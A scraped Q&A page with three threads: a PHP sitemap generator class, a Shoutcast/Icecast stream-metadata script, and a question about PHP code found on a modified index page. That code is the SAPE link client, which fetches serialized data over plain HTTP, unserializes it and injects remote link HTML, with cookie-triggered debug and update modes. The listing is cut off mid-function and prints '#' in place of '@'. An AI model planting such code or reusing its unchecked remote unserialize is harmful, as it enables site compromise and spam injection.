public function url ($url, $lastmod='', $changefreq='', $priority='') {
// htmlspecialchars() escapes the characters that are special in XML text.
$url = htmlspecialchars(BASE_URL . $url);
$lastmod = (!empty($lastmod)) ? date('Y-m-d', strtotime($lastmod)) : false;
$changefreq = (!empty($changefreq) && in_array(strtolower($changefreq), array('always', 'hourly', 'daily', 'weekly', 'monthly', 'yearly', 'never'))) ? strtolower($changefreq) : false;
$priority = (!empty($priority) && is_numeric($priority) && abs($priority) <= 1) ? round(abs($priority), 1) : false;
if (!$lastmod && !$changefreq && !$priority) {
$this->urls[] = $url;
} else {
$url = array('loc'=>$url);
if ($lastmod !== false) $url['lastmod'] = $lastmod;
if ($changefreq !== false) $url['changefreq'] = $changefreq;
if ($priority !== false) $url['priority'] = ($priority < 1) ? $priority : '1.0';
$this->urls[] = $url;
}
// Flush once the file holds 50000 URLs.
if ($this->count == 50000) {
$this->save();
} else {
$this->count++;
}
}
/**
 * Flushes whatever is still buffered and pings the search engines.
 */
public function close() {
$this->save();
$this->ping_search_engines();
}
/**
 * Writes the buffered URLs to the next sitemap file, deletes higher-numbered files of the
 * same section left over from an earlier run and registers the new file in the index.
 * Does nothing when the buffer is empty.
 */
private function save () {
if (empty($this->urls)) return;
$file = "sitemap-{$this->page}-{$this->index}.xml{$this->compress}";
$xml = '<?xml version="1.0" encoding="UTF-8"?>' . "\n";
$xml .= '<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">' . "\n";
foreach ($this->urls as $url) {
$xml .= ' <url>' . "\n";
if (is_array($url)) {
foreach ($url as $key => $value) $xml .= " <{$key}>{$value}</{$key}>\n";
} else {
$xml .= " <loc>{$url}</loc>\n";
}
$xml .= ' </url>' . "\n";
}
$xml .= '</urlset>' . "\n";
$this->urls = array();
if (!empty($this->compress)) $xml = gzencode($xml, 9);
// NOTE(review): the fopen() result is not checked; an unwritable BASE_URI makes the
// fwrite()/fclose() calls below fail.
$fp = fopen(BASE_URI . $file, 'wb');
fwrite($fp, $xml);
fclose($fp);
$this->index++;
$this->count = 1;
$num = $this->index; // should have already been incremented
// Deletes every consecutive higher-numbered file of this section. Because this runs after
// each flush, files numbered above the one just written are removed and rewritten as the
// run proceeds.
while (file_exists(BASE_URI . "sitemap-{$this->page}-{$num}.xml{$this->compress}")) {
unlink(BASE_URI . "sitemap-{$this->page}-{$num}.xml{$this->compress}");
$num++;
}
$this->index($file);
}
/**
 * Rewrites the sitemap index: keeps existing entries whose files still exist and adds or
 * refreshes the entry for $file with today's date.
 */
private function index ($file) {
$sitemaps = array();
$index = "sitemap-index.xml{$this->compress}";
if (file_exists(BASE_URI . $index)) {
$xml = (!empty($this->compress)) ? gzfile(BASE_URI . $index) : file(BASE_URI . $index);
$tags = $this->xml_tag(implode('', $xml), array('sitemap'));
foreach ($tags as $xml) {
$loc = str_replace(BASE_URL, '', $this->xml_tag($xml, 'loc'));
$lastmod = $this->xml_tag($xml, 'lastmod');
$lastmod = ($lastmod) ? date('Y-m-d', strtotime($lastmod)) : date('Y-m-d');
if (file_exists(BASE_URI . $loc)) $sitemaps[$loc] = $lastmod;
}
}
$sitemaps[$file] = date('Y-m-d');
$xml = '<?xml version="1.0" encoding="UTF-8"?>' . "\n";
$xml .= '<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">' . "\n";
foreach ($sitemaps as $loc => $lastmod) {
$xml .= ' <sitemap>' . "\n";
$xml .= ' <loc>' . BASE_URL . $loc . '</loc>' . "\n";
$xml .= ' <lastmod>' . $lastmod . '</lastmod>' . "\n";
$xml .= ' </sitemap>' . "\n";
}
$xml .= '</sitemapindex>' . "\n";
if (!empty($this->compress)) $xml = gzencode($xml, 9);
$fp = fopen(BASE_URI . $index, 'wb');
fwrite($fp, $xml);
fclose($fp);
}
/**
 * Extracts the text of the first <$tag> element by string search (no XML parser).
 * With an array as $tag, returns the contents of every occurrence of $tag[0].
 *
 * @param string       $xml XML text to search.
 * @param string|array $tag Tag name, or a one-element array to collect all occurrences.
 * @param int          $end Set to the offset just past the closing tag.
 * @return string|array|false
 */
private function xml_tag ($xml, $tag, &$end='') {
if (is_array($tag)) {
$tags = array();
while ($value = $this->xml_tag($xml, $tag[0], $end)) {
$tags[] = $value;
$xml = substr($xml, $end);
}
return $tags;
}
$pos = strpos($xml, "<{$tag}>");
if ($pos === false) return false;
$start = strpos($xml, '>', $pos) + 1;
$length = strpos($xml, "</{$tag}>", $start) - $start;
// NOTE(review): strpos() + 1 is never false, so the check on the return line always
// passes, and a missing closing tag yields a negative $length instead of a failure.
$end = strpos($xml, '>', $start + $length) + 1;
return ($end !== false) ? substr($xml, $start, $length) : false;
}
/**
 * Sends a HEAD request with the index URL to each listed search-engine host and raises a
 * PHP error (trigger_error) for any status other than 200.
 *
 * The requests go over plain HTTP on port 80; a host that cannot be reached is skipped.
 * NOTE(review): whether these ping endpoints are still served is not visible from here.
 */
public function ping_search_engines () {
$sitemap = BASE_URL . 'sitemap-index.xml' . $this->compress;
$engines = array();
$engines['www.google.com'] = '/webmasters/tools/ping?sitemap=' . urlencode($sitemap);
$engines['www.bing.com'] = '/webmaster/ping.aspx?siteMap=' . urlencode($sitemap);
$engines['submissions.ask.com'] = '/ping?sitemap=' . urlencode($sitemap);
foreach ($engines as $host => $path) {
if ($fp = fsockopen($host, 80)) {
$send = "HEAD $path HTTP/1.1\r\n";
$send .= "HOST: $host\r\n";
$send .= "CONNECTION: Close\r\n\r\n";
fwrite($fp, $send);
// Only the status line is read: protocol version, then status code.
$http_response = fgets($fp, 128);
fclose($fp);
list($response, $code) = explode (' ', $http_response);
if ($code != 200) trigger_error ("{$host} ping was unsuccessful.<br />Code: {$code}<br />Response: {$response}");
}
}
}
/**
 * Flushes any remaining URLs when the object is destroyed.
 */
public function __destruct () {
$this->save();
}
}
?>
There is already an example of usage on the page:
<?php
// Rebuild whichever sitemap sections the request names in ?update=... (see get()).
require_once ('php/classes/Sitemap.php');

$sitemap = new Sitemap;

// Section "pages": one entry per row, refreshed yearly.
if (get('pages')) {
    $sitemap->page('pages');
    $result = db_query ("SELECT url, created FROM pages"); // 20 pages
    while (list($url, $created) = $result->fetch_row()) {
        $sitemap->url($url, $created, 'yearly');
    }
}

// Section "posts": one entry per row, refreshed monthly.
if (get('posts')) {
    $sitemap->page('posts');
    $result = db_query ("SELECT url, updated FROM posts"); // 70,000 posts
    while (list($url, $updated) = $result->fetch_row()) {
        $sitemap->url($url, $updated, 'monthly');
    }
}

// Flush the last file, then drop the object.
$sitemap->close();
unset ($sitemap);
/**
 * Tells whether $name occurs in the "update" query-string parameter.
 *
 * @param string $name Section name to look for (substring match).
 * @return bool
 */
function get ($name) {
    if (!isset($_GET['update'])) {
        return false;
    }
    return strpos($_GET['update'], $name) !== false;
}
?>
I would change this part....
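if (get('pages')) {
    $sitemap->page('pages');
    $result = db_query ("SELECT uri FROM myuri");
    // Rows are read with ->fetch_row(), as the usage example does for db_query() results;
    // the mysql_fetch_row() call used here before belongs to a different database API.
    while (list($url) = $result->fetch_row()) {
        $sitemap->url($url, '', 'yearly');
    }
}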
Not sure if that $updated is needed? It looks like the function just defaults it to an empty string anyway. But maybe you could add a timestamp column to your table to pull the last-updated date as well, and feed it into the function where I put ''.
Also....remove this part...
if (get('posts')) {
$sitemap->page('posts');
$result = db_query ("SELECT url, updated FROM posts"); // 70,000 posts
while (list($url, $updated) = $result->fetch_row()) {
$sitemap->url($url, $updated, 'monthly');
}
}

PHP script to extract artist & title from Shoutcast/Icecast stream

I found a script which can extract the artist & title name from an Icecast or Shoutcast stream.
I want the script to update automatically when a song changed, at the moment its working only when i execute it. I'm new to PHP so any help will be appreciated.
Thanks!
define('CRLF', "\r\n");
/**
 * Connects once to a Shoutcast/Icecast stream, reads the response headers and the first
 * metadata block, and exposes both through magic property access ($obj->streamtitle,
 * $obj->icymetaint, ...).
 *
 * Everything stored in $headers and $metadata comes from the remote server unfiltered, so
 * callers should escape it before printing it into a page.
 */
class streaminfo{
// TRUE once a response has been read and parsed.
public $valid = false;
public $useragent = 'Winamp 2.81';
// Response headers keyed by lower-cased name with non-alphanumerics stripped.
protected $headers = array();
// Stream metadata keyed the same way (e.g. 'streamtitle').
protected $metadata = array();
/**
 * Opens the stream and parses headers and metadata. Errors are echoed, not thrown.
 *
 * @param string $location Stream URL; user and password in the URL are sent as Basic auth.
 */
public function __construct($location){
$errno = $errstr = '';
$t = parse_url($location);
// NOTE(review): $t['port'] is read without a check, so a URL without an explicit port
// has no port to connect to. Connection timeout is 5 seconds.
$sock = fsockopen($t['host'], $t['port'], $errno, $errstr, 5);
$path = isset($t['path'])?$t['path']:'/';
if ($sock){
// "icy-metadata: 1" asks the server to interleave metadata blocks with the audio data.
$request = 'GET '.$path.' HTTP/1.0' . CRLF .
'Host: ' . $t['host'] . CRLF .
'Connection: Close' . CRLF .
'User-Agent: ' . $this->useragent . CRLF .
'Accept: */*' . CRLF .
'icy-metadata: 1'.CRLF.
'icy-prebuffer: 65536'.CRLF.
(isset($t['user'])?'Authorization: Basic '.base64_encode($t['user'].':'.$t['pass']).CRLF:'').
'X-TipOfTheDay: Winamp "Classic" rulez all of them.' . CRLF . CRLF;
if (fwrite($sock, $request)){
// Read header lines up to the first blank line.
$theaders = $line = '';
while (!feof($sock)){
$line = fgets($sock, 4096);
if('' == trim($line)){
break;
}
$theaders .= $line;
}
$theaders = explode(CRLF, $theaders);
foreach ($theaders as $header){
// $t is reused here; the parsed URL is no longer needed at this point.
$t = explode(':', $header);
if (isset($t[0]) && trim($t[0]) != ''){
// Normalises e.g. "icy-metaint" to "icymetaint".
$name = preg_replace('/[^a-z][^a-z0-9]*/i','', strtolower(trim($t[0])));
array_shift($t);
$value = trim(implode(':', $t));
if ($value != ''){
if (is_numeric($value)){
$this->headers[$name] = (int)$value;
}else{
$this->headers[$name] = $value;
}
}
}
}
if (!isset($this->headers['icymetaint'])){
// No metadata interval announced: read 512 bytes and search them for key=value pairs.
// This branch prints debugging output (print_data() and var_dump()) straight to the page.
$data = ''; $metainterval = 512;
while(!feof($sock)){
$data .= fgetc($sock);
if (strlen($data) >= $metainterval) break;
}
$this->print_data($data);
$matches = array();
// NOTE(review): the second call overwrites $matches from the first, and
// PREG_SPLIT_NO_EMPTY is a preg_split() flag. The loop below indexes $values as
// [text, offset] pairs, which only the first call would produce - verify.
preg_match_all('/([\x00-\xff]{2})\x0\x0([a-z]+)=/i', $data, $matches, PREG_OFFSET_CAPTURE);
preg_match_all('/([a-z]+)=([a-z0-9\(\)\[\]., ]+)/i', $data, $matches, PREG_SPLIT_NO_EMPTY);
echo '<pre>';var_dump($matches);echo '</pre>';
$title = $artist = '';
foreach ($matches[0] as $nr => $values){
$offset = $values[1];
// Four bytes combined as a little-endian length.
// NOTE(review): the {n} string-offset syntax was removed in PHP 8; use [n] there.
$length = ord($values[0]{0}) +
(ord($values[0]{1}) * 256)+
(ord($values[0]{2}) * 256*256)+
(ord($values[0]{3}) * 256*256*256);
$info = substr($data, $offset + 4, $length);
$seperator = strpos($info, '=');
$this->metadata[substr($info, 0, $seperator)] = substr($info, $seperator + 1);
if (substr($info, 0, $seperator) == 'title') $title = substr($info, $seperator + 1);
if (substr($info, 0, $seperator) == 'artist') $artist = substr($info, $seperator + 1);
}
$this->metadata['streamtitle'] = $artist . ' - ' . $title;
}else{
// Metadata interval announced: skip that many bytes of audio, then read one length byte
// (multiplied by 16) followed by the metadata block. Gives up after 100 empty blocks.
$metainterval = $this->headers['icymetaint'];
$intervals = 0;
$metadata = '';
while(1){
$data = '';
while(!feof($sock)){
$data .= fgetc($sock);
if (strlen($data) >= $metainterval) break;
}
//$this->print_data($data);
$len = join(unpack('c', fgetc($sock))) * 16;
if ($len > 0){
$metadata = str_replace("\0", '', fread($sock, $len));
break;
}else{
$intervals++;
if ($intervals > 100) break;
}
}
// The block is a ";"-separated list of name='value' pairs.
$metarr = explode(';', $metadata);
foreach ($metarr as $meta){
$t = explode('=', $meta);
if (isset($t[0]) && trim($t[0]) != ''){
$name = preg_replace('/[^a-z][^a-z0-9]*/i','', strtolower(trim($t[0])));
array_shift($t);
$value = trim(implode('=', $t));
// Strip one leading and one trailing quote character.
if (substr($value, 0, 1) == '"' || substr($value, 0, 1) == "'"){
$value = substr($value, 1);
}
if (substr($value, -1) == '"' || substr($value, -1) == "'"){
$value = substr($value, 0, -1);
}
if ($value != ''){
$this->metadata[$name] = $value;
}
}
}
}
fclose($sock);
$this->valid = true;
}else echo 'unable to write.';
}else echo 'no socket '.$errno.' - '.$errstr.'.';
}
/**
 * Debug helper: echoes $data as a hex dump inside <pre>, 16 bytes per row, followed by
 * the row's text. Bytes in the printable ASCII range are echoed as they are, including
 * "<" and "&", so stream content is written into the page without HTML escaping.
 *
 * @param string $data Raw bytes to dump.
 */
public function print_data($data){
$data = str_split($data);
$c = 0;
$string = '';
echo "<pre>\n000000 ";
foreach ($data as $char){
$string .= addcslashes($char, "\n\r\0\t");
$hex = dechex(join(unpack('C', $char)));
if ($c % 4 == 0) echo ' ';
if ($c % (4*4) == 0 && $c != 0){
foreach (str_split($string) as $s){
//echo " $string\n";
if (ord($s) < 32 || ord($s) > 126){
echo '\\'.ord($s);
}else{
echo $s;
}
}
echo "\n";
$string = '';
echo str_pad($c, 6, '0', STR_PAD_LEFT).' ';
}
if (strlen($hex) < 1) $hex = '00';
if (strlen($hex) < 2) $hex = '0'.$hex;
echo $hex.' ';
$c++;
}
echo " $string\n</pre>";
}
/**
 * Magic read access: metadata is looked up first, then response headers.
 *
 * @param string $name Normalised key, e.g. 'streamtitle' or 'icymetaint'.
 * @return mixed The stored value, or null when the key is unknown.
 */
public function __get($name){
if (isset($this->metadata[$name])){
return $this->metadata[$name];
}
if (isset($this->headers[$name])){
return $this->headers[$name];
}
return null;
}
}
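// Connect to the stream once and print two of the parsed values.
$t = new streaminfo('http://64.236.34.196:80/stream/1014'); // get metadata
// The labels are now quoted string literals; unquoted, these two lines were a parse error.
// Both values come from the remote server, so they are HTML-escaped before output.
echo 'Meta Interval: ' . htmlspecialchars((string) $t->icymetaint, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
echo 'Current Track: ' . htmlspecialchars((string) $t->streamtitle, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');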
You will need to constantly query the stream at a set interval to find when the song changes.
This can be best done by scheduling a cron job.
If on Windows, you should use the Windows Task Scheduler
If you want to run the PHP script to keep your meta data up to date (I'm assuming you're making a website and using html audio tags here) you can use the ontimeupdate event with an ajax function. If you're not you probably should look up your audio playback documentation for something similar.
<audio src="http://ip:port/;" ontimeupdate="loadXMLDoc()">
You can find a great example here http://www.w3schools.com/php/php_ajax_php.asp
You want to use the PHP echo function to output all the relevant information at once, using one PHP variable at the very end of your script.
<?php ....
$phpVar=$streamtitle;
$phpVar2=$streamsong;
$result="I want my string to look like this: <br> {$phpVar} {$phpVar2}";
echo $result;
?>
Then use the function called by .onreadystatechange to modify the particular elements you want on your website by using .responseText (this will contain the same content as your PHP script's echo).
After SCOURING the web for 4 hours, this is the only Shoutcast metadata script I've found that works! Thankyou.
To run this constantly, why not use a setInterval combined with jQuery's AJAX call?
<script>
// Ask track_name.php for the current track and show it in #results.
function getTrackName() {
    var request = $.ajax({ url: "track_name.php" });
    request.done(function (trackText) {
        // .text() inserts the response as plain text, so markup inside a
        // stream title is displayed rather than interpreted as HTML.
        $("#results").text(trackText);
    });
}

// Once the DOM is ready, refresh the track name every 16 seconds.
$(function () {
    setInterval(getTrackName, 16000);
});
</script>
Also your last couple 'echo' lines were breaking the script for me. Just put quotes around the Meta Interval, etc....

Hacker Backdoor script? [closed]

I found this script attached to a modified index page. It looks like some kind of backdoor. And who is this SAPE?
<?php
class SAPE_base {
var $_version = '1.0.8';
var $_verbose = false;
var $_charset = '';
var $_sape_charset = '';
var $_server_list = array('dispenser-01.sape.ru', 'dispenser-02.sape.ru');
var $_cache_lifetime = 3600;
var $_cache_reloadtime = 600;
var $_error = '';
var $_host = '';
var $_request_uri = '';
var $_multi_site = false;
var $_fetch_remote_type = '';
var $_socket_timeout = 6;
var $_force_show_code = false;
var $_is_our_bot = false;
var $_debug = false;
var $_ignore_case = false;
var $_db_file = '';
var $_use_server_array = false;
var $_force_update_db = false;
/**
 * PHP4-style constructor: copies the caller's options and parts of the current
 * request into object state.
 *
 * @param array|string|null $options Either an options array (keys read here: host,
 *        use_server_array, request_uri, multi_site, debug, verbose, charset,
 *        fetch_remote_type, socket_timeout, force_show_code, ignore_case) or a
 *        bare host string.
 * @return false|null false (from raise_error) when the _SAPE_USER constant is not defined.
 */
function SAPE_base($options = null) {
$host = '';
if (is_array($options)) {
if (isset($options['host'])) {
$host = $options['host'];
}
}
elseif (strlen($options)) {
// A non-empty scalar argument is taken as the host name itself.
$host = $options;
$options = array();
}
else {
$options = array();
}
if (isset($options['use_server_array']) && $options['use_server_array'] == true) {
$this->_use_server_array = true;
}
if (strlen($host)) {
$this->_host = $host;
}
else {
// NOTE(review): HTTP_HOST is supplied by the client. _get_db_file() and
// _get_dispenser_path() later concatenate _host into a file name and a URL.
$this->_host = $_SERVER['HTTP_HOST'];
}
// Strip a leading "http://" and "www." so the host is stored in bare form.
$this->_host = preg_replace('/^http:\/\//', '', $this->_host);
$this->_host = preg_replace('/^www\./', '', $this->_host);
if (isset($options['request_uri']) && strlen($options['request_uri'])) {
$this->_request_uri = $options['request_uri'];
}
elseif ($this->_use_server_array === false) {
$this->_request_uri = getenv('REQUEST_URI');
}
if (strlen($this->_request_uri) == 0) {
$this->_request_uri = $_SERVER['REQUEST_URI'];
}
if (isset($options['multi_site']) && $options['multi_site'] == true) {
$this->_multi_site = true;
}
if (isset($options['debug']) && $options['debug'] == true) {
$this->_debug = true;
}
// A request whose sape_cookie equals _SAPE_USER is treated as the service's own bot.
// NOTE(review): the comparison is loose (==), and _SAPE_USER is read here before
// the defined('_SAPE_USER') check further down.
if (isset($_COOKIE['sape_cookie']) && ($_COOKIE['sape_cookie'] == _SAPE_USER)) {
$this->_is_our_bot = true;
// With sape_debug=1 the same visitor also switches on debug mode; the options,
// both request URIs and _SAPE_USER are copied onto the object.
// SAPE_client::return_links() appends print_r($this) to its output when _debug is set.
if (isset($_COOKIE['sape_debug']) && ($_COOKIE['sape_debug'] == 1)) {
$this->_debug = true;
$this->_options = $options;
$this->_server_request_uri = $this->_request_uri = $_SERVER['REQUEST_URI'];
$this->_getenv_request_uri = getenv('REQUEST_URI');
$this->_SAPE_USER = _SAPE_USER;
}
// sape_updatedb=1 makes load_data() re-download the database on this request.
if (isset($_COOKIE['sape_updatedb']) && ($_COOKIE['sape_updatedb'] == 1)) {
$this->_force_update_db = true;
}
}
else {
$this->_is_our_bot = false;
}
// && binds tighter than ||, so debug mode alone is enough to turn verbose on.
if (isset($options['verbose']) && $options['verbose'] == true || $this->_debug) {
$this->_verbose = true;
}
if (isset($options['charset']) && strlen($options['charset'])) {
$this->_charset = $options['charset'];
}
else {
// Default page charset when the caller gives none.
$this->_charset = 'windows-1251';
}
if (isset($options['fetch_remote_type']) && strlen($options['fetch_remote_type'])) {
$this->_fetch_remote_type = $options['fetch_remote_type'];
}
if (isset($options['socket_timeout']) && is_numeric($options['socket_timeout']) && $options['socket_timeout'] > 0) {
$this->_socket_timeout = $options['socket_timeout'];
}
if (isset($options['force_show_code']) && $options['force_show_code'] == true) {
$this->_force_show_code = true;
}
if (!defined('_SAPE_USER')) {
// Message text: "The _SAPE_USER constant is not set".
return $this->raise_error('Не задана константа _SAPE_USER');
}
if (isset($options['ignore_case']) && $options['ignore_case'] == true) {
$this->_ignore_case = true;
// Lower-cased last, so it applies to whichever request URI was chosen above.
$this->_request_uri = strtolower($this->_request_uri);
}
}
/**
 * Download http://$host$path using the first available transport
 * (file_get_contents, cURL, or a raw socket on port 80) and return the body.
 *
 * The transfer is plain HTTP in all three branches; nothing here authenticates
 * the server or checks the integrity of the response.
 *
 * NOTE(review): the '#' printed in front of function calls in this listing is
 * most likely the page's rendering of PHP's '@' error-suppression operator. As
 * printed, '#' starts a comment and the affected lines do not parse.
 *
 * @param string $host Server name to contact.
 * @param string $path Path and query string to request.
 * @return string|false Response body, or false (from raise_error) when no branch returned data.
 */
function fetch_remote_file($host, $path) {
$user_agent = $this->_user_agent . ' ' . $this->_version;
#ini_set('allow_url_fopen', 1);
#ini_set('default_socket_timeout', $this->_socket_timeout);
#ini_set('user_agent', $user_agent);
// Branch 1: file_get_contents, when requested explicitly or when no type is set
// and allow_url_fopen is enabled.
if (
$this->_fetch_remote_type == 'file_get_contents'
||
(
$this->_fetch_remote_type == ''
&&
function_exists('file_get_contents')
&&
ini_get('allow_url_fopen') == 1
)
) {
// The transport that was picked is remembered on the object.
$this->_fetch_remote_type = 'file_get_contents';
if ($data = #file_get_contents('http://' . $host . $path)) {
return $data;
}
}
// Branch 2: cURL, when requested explicitly or when no type is set and curl_init exists.
elseif (
$this->_fetch_remote_type == 'curl'
||
(
$this->_fetch_remote_type == ''
&&
function_exists('curl_init')
)
) {
$this->_fetch_remote_type = 'curl';
if ($ch = #curl_init()) {
#curl_setopt($ch, CURLOPT_URL, 'http://' . $host . $path);
#curl_setopt($ch, CURLOPT_HEADER, false);
#curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
#curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $this->_socket_timeout);
#curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
// On success the function returns before the curl_close() call below is reached.
if ($data = #curl_exec($ch)) {
return $data;
}
#curl_close($ch);
}
}
// Branch 3: hand-written HTTP/1.0 GET over a socket.
else {
$this->_fetch_remote_type = 'socket';
$buff = '';
$fp = #fsockopen($host, 80, $errno, $errstr, $this->_socket_timeout);
if ($fp) {
#fputs($fp, "GET {$path} HTTP/1.0\r\nHost: {$host}\r\n");
#fputs($fp, "User-Agent: {$user_agent}\r\n\r\n");
while (!#feof($fp)) {
$buff .= #fgets($fp, 128);
}
#fclose($fp);
// Everything up to the first blank line is headers; element 1 is what follows it.
$page = explode("\r\n\r\n", $buff);
return $page[1];
}
}
// Message text: "Cannot connect to server: <host><path>, type: <transport>".
return $this->raise_error('Не могу подключиться к серверу: ' . $host . $path . ', type: ' . $this->_fetch_remote_type);
}
/**
 * Read a whole file under a shared lock.
 *
 * NOTE(review): the '#' printed in front of function calls in this listing is
 * most likely the page's rendering of PHP's '@' error-suppression operator. As
 * printed, '#' starts a comment and the affected lines do not parse.
 *
 * @param string $filename Path of the file to read.
 * @return string|false File contents ('' for an empty file), or false (from
 *         raise_error) when the file could not be opened.
 */
function _read($filename) {
$fp = #fopen($filename, 'rb');
// The lock call comes before the check that the open succeeded.
#flock($fp, LOCK_SH);
if ($fp) {
// Drop cached stat data so filesize() reflects the file as it is now.
clearstatcache();
$length = #filesize($filename);
// magic_quotes_runtime is switched off for the read and restored afterwards.
$mqr = #get_magic_quotes_runtime();
#set_magic_quotes_runtime(0);
if ($length) {
$data = #fread($fp, $length);
}
else {
$data = '';
}
#set_magic_quotes_runtime($mqr);
#flock($fp, LOCK_UN);
#fclose($fp);
return $data;
}
// Message text: "Cannot read data from file: <filename>".
return $this->raise_error('Не могу считать данные из файла: ' . $filename);
}
/**
 * Replace a file's contents under an exclusive, non-blocking lock and verify
 * the result by reading it back.
 *
 * NOTE(review): the '#' printed in front of function calls in this listing is
 * most likely the page's rendering of PHP's '@' error-suppression operator. As
 * printed, '#' starts a comment and the affected lines do not parse.
 *
 * @param string $filename Path of the file to write.
 * @param string $data     Bytes to store.
 * @return bool true on success; false when the lock is held elsewhere, when the
 *         read-back differs, or when the file could not be opened.
 */
function _write($filename, $data) {
// Opened in append mode; the file is only truncated once the lock is held.
$fp = #fopen($filename, 'ab');
if ($fp) {
if (flock($fp, LOCK_EX | LOCK_NB)) {
$length = strlen($data);
ftruncate($fp, 0);
#fwrite($fp, $data, $length);
#flock($fp, LOCK_UN);
#fclose($fp);
// md5 is used here only to compare what was written with what is read back.
if (md5($this->_read($filename)) != md5($data)) {
// A mismatching file is deleted rather than left in place.
#unlink($filename);
// Message text: "Data integrity violated while writing to file: <filename>".
return $this->raise_error('Нарушена целостность данных при записи в файл: ' . $filename);
}
}
else {
// Lock not obtained: give up without waiting. $fp is not closed on this path.
return false;
}
return true;
}
// Message text: "Cannot write data to file: <filename>".
return $this->raise_error('Не могу записать данные в файл: ' . $filename);
}
/**
 * Store an error as an HTML fragment in $this->_error and print it when the
 * object is in verbose mode.
 *
 * NOTE(review): $e is placed into the markup unescaped, and load_data() passes
 * the remote server's "FATAL ERROR:" response through this method.
 *
 * @param string $e Error text.
 * @return false Always false, so callers can write `return $this->raise_error(...)`.
 */
function raise_error($e) {
    $markup = '<p style="color: red; font-weight: bold;">SAPE ERROR: ' . $e . '</p>';
    $this->_error = $markup;
    // Loose comparison kept on purpose: any value equal to true counts as verbose.
    if ($this->_verbose == true) {
        print $markup;
    }
    return false;
}
/**
 * Load the local database file, refreshing it from the dispenser servers when
 * it is stale, empty or unreadable, and hand the decoded data to set_data().
 *
 * NOTE(review): the '#' printed in front of function calls in this listing is
 * most likely the page's rendering of PHP's '@' error-suppression operator. As
 * printed, '#' starts a comment and the affected lines do not parse.
 *
 * NOTE(review): the downloaded response and the cache file are both passed to
 * unserialize(). fetch_remote_file() retrieves the data over plain HTTP, so a
 * tampered response reaches unserialize() unchecked; PHP's documentation warns
 * against unserializing untrusted input.
 *
 * @return false|null false (from raise_error) when the database file cannot be
 *         created or is not writable; otherwise nothing.
 */
function load_data() {
$this->_db_file = $this->_get_db_file();
if (!is_file($this->_db_file)) {
// Create the cache file and make it readable and writable by every user.
if (#touch($this->_db_file)) {
#chmod($this->_db_file, 0666);
}
else {
// Message text: "File <path> does not exist. Could not create it. Set
// permissions 777 on the folder."
return $this->raise_error('Нет файла ' . $this->_db_file . '. Создать не удалось. Выставите права 777 на папку.');
}
}
if (!is_writable($this->_db_file)) {
// Message text: "No write access to file: <path>! Set permissions 777 on the folder."
return $this->raise_error('Нет доступа на запись к файлу: ' . $this->_db_file . '! Выставите права 777 на папку.');
}
#clearstatcache();
$data = $this->_read($this->_db_file);
// Refresh when forced by cookie, or - for ordinary visitors only - when the
// cache is older than _cache_lifetime, empty, or does not unserialize.
if (
$this->_force_update_db
|| (
!$this->_is_our_bot
&&
(
filemtime($this->_db_file) < (time() - $this->_cache_lifetime)
||
filesize($this->_db_file) == 0
||
#unserialize($data) == false
)
)
) {
// Back-date the mtime so that, if the download fails, the next attempt happens
// after _cache_reloadtime seconds instead of on every request.
#touch($this->_db_file, (time() - $this->_cache_lifetime + $this->_cache_reloadtime));
$path = $this->_get_dispenser_path();
if (strlen($this->_charset)) {
$path .= '&charset=' . $this->_charset;
}
// Try each dispenser in turn and stop at the first usable answer.
foreach ($this->_server_list as $i => $server) {
if ($data = $this->fetch_remote_file($server, $path)) {
if (substr($data, 0, 12) == 'FATAL ERROR:') {
$this->raise_error($data);
}
else {
$hash = #unserialize($data);
if ($hash != false) {
// Local settings and environment details are stored next to the downloaded data.
$hash['__sape_charset__'] = $this->_charset;
$hash['__last_update__'] = time();
$hash['__multi_site__'] = $this->_multi_site;
$hash['__fetch_remote_type__'] = $this->_fetch_remote_type;
$hash['__ignore_case__'] = $this->_ignore_case;
$hash['__php_version__'] = phpversion();
$hash['__server_software__'] = $_SERVER['SERVER_SOFTWARE'];
$data_new = #serialize($hash);
if ($data_new) {
$data = $data_new;
}
$this->_write($this->_db_file, $data);
break;
}
}
}
}
}
// Remove "name=id" of the active session from the request URI, so the lookup
// in set_data() is done on the URI without it.
if (strlen(session_id())) {
$session = session_name() . '=' . session_id();
$this->_request_uri = str_replace(array('?' . $session, '&' . $session), '', $this->_request_uri);
}
$this->set_data(#unserialize($data));
}
}
class SAPE_client extends SAPE_base {
var $_links_delimiter = '';
var $_links = array();
var $_links_page = array();
var $_user_agent = 'SAPE_Client PHP';
/**
 * PHP4-style constructor: runs the base-class setup, then loads the link
 * database immediately, so constructing the object may perform file and
 * network I/O (see load_data()).
 *
 * @param array|string|null $options Passed through unchanged to SAPE_base().
 */
function SAPE_client($options = null) {
parent::SAPE_base($options);
// Must follow the base constructor: load_data() relies on the state it sets.
$this->load_data();
}
/**
 * Return the HTML for the links assigned to the current page, consuming them
 * from $this->_links_page as they are emitted.
 *
 * The link markup comes from the database that load_data() downloads and is
 * returned without escaping, so whoever controls that data controls the HTML
 * placed on the page.
 *
 * NOTE(review): the '#' printed in front of iconv() in this listing is most
 * likely the page's rendering of PHP's '@' error-suppression operator. As
 * printed, '#' starts a comment and that line does not parse.
 *
 * @param int|null $n      Number of links to take; a non-numeric value or a
 *                         value above the available count means "all".
 * @param int      $offset Number of leading links to take and discard.
 * @return mixed Joined link HTML, or the raw _links_page value when it is not an array.
 */
function return_links($n = null, $offset = 0) {
if (is_array($this->_links_page)) {
$total_page_links = count($this->_links_page);
if (!is_numeric($n) || $n > $total_page_links) {
$n = $total_page_links;
}
$links = array();
// Each iteration removes one link from the queue; the first $offset are dropped.
for ($i = 1; $i <= $n; $i++) {
if ($offset > 0 && $i <= $offset) {
array_shift($this->_links_page);
}
else {
$links[] = array_shift($this->_links_page);
}
}
$html = join($this->_links_delimiter, $links);
// Convert from the database charset to the page charset when both are known
// and differ; the unconverted HTML is kept if iconv returns nothing.
if (
strlen($this->_charset) > 0
&&
strlen($this->_sape_charset) > 0
&&
$this->_sape_charset != $this->_charset
&&
function_exists('iconv')
) {
$new_html = #iconv($this->_sape_charset, $this->_charset, $html);
if ($new_html) {
$html = $new_html;
}
}
if ($this->_is_our_bot) {
$html = '<sape_noindex>' . $html . '</sape_noindex>';
}
}
else {
$html = $this->_links_page;
}
